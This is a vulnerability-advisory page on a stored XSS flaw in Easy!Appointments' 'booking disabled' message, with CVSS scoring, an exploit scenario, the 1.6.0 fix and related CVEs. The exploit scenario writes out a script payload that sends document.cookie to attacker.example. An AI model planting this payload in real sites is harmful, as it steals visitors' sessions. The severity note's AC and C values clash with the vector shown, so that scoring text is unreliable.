Severity by source
AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N
PR:H confirmed by admin-only write access; AC:L because once payload is stored any visitor triggers it without further attacker complexity; C:L added since XSS enables content and credential exfiltration in the victim browser session.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N
Lifecycle Timeline
3DescriptionCVE.org
Easy!Appointments is a self hosted appointment scheduler. Versions prior to 1.6.0 allow administrators to define a custom "booking disabled" message through the booking settings page. That value is stored in the disable_booking_message setting via a rich-text editor and later passed directly to the public booking_message view without escaping or sanitization. An authenticated administrator can store HTML or JavaScript in this field, enable disabled-booking mode, and trigger stored XSS in every unauthenticated visitor who opens the public booking page. Version 1.6.0 fixes the issue.
AnalysisAI
Stored XSS in Easy!Appointments versions prior to 1.6.0 allows an authenticated administrator to inject arbitrary HTML or JavaScript into the 'booking disabled' message field via the booking settings rich-text editor. The unsanitized value is rendered directly to every unauthenticated visitor who opens the public booking page while booking is disabled, crossing a scope boundary from admin context to anonymous public users. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Two distinct preconditions must both be met for exploitation. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The official CVSS 3.1 base score is 2.6 (Low), driven primarily by PR:H (administrator authentication required to plant the payload), AC:H, and UI:R (the victim must visit the page). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker holding or having compromised administrator credentials navigates to the booking settings page and enters a JavaScript payload such as `<script>fetch('https://attacker.example/log?c='+document.cookie)</script>` into the rich-text 'booking disabled' message field, then enables booking-disabled mode. From that point forward, every unauthenticated visitor who loads the public booking URL silently executes the stored script, enabling cookie exfiltration, phishing overlays injected into the trusted booking domain, or silent redirection to attacker-controlled infrastructure. … |
| Remediation | Upgrade to Easy!Appointments version 1.6.0, which resolves the issue by applying `pure_html()` sanitization both at save time within `Booking_settings.php` and at render time in the `booking_message.php` view, as confirmed by commit 629a0415f54f75556c17f4f5d9c77fda1fdbdeae (https://github.com/alextselegidis/easyappointments/commit/629a0415f54f75556c17f4f5d9c77fda1fdbdeae). … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Easyappointments
View allAn issue in Alex Tselegidis EasyAppointments v.1.5.0 allows a remote attacker to escalate privileges via the index.php f
Use of Hard-coded Credentials in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated critical severi
Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository alextselegidis/easyappointments p
Session Fixation in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated high severity (CVSS 8.8), th
API Privilege Escalation in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated high severity (CVSS
Cross Site Scripting vulnerability in Alex Tselegidis EasyAppointments v.1.5.0 allows a remote attacker to execute arbit
Improper Access Control in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated medium severity (CVSS
Cross-site Scripting (XSS) - Stored in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated medium se
Cross-site Scripting (XSS) - Stored in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated medium se
Authorization Bypass Through User-Controlled Key in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Ra
Code Injection in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated low severity (CVSS 3.8), this
Broken object-level authorization in Easy!Appointments 1.5.2 lets any authenticated user query the customers search endp
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-43705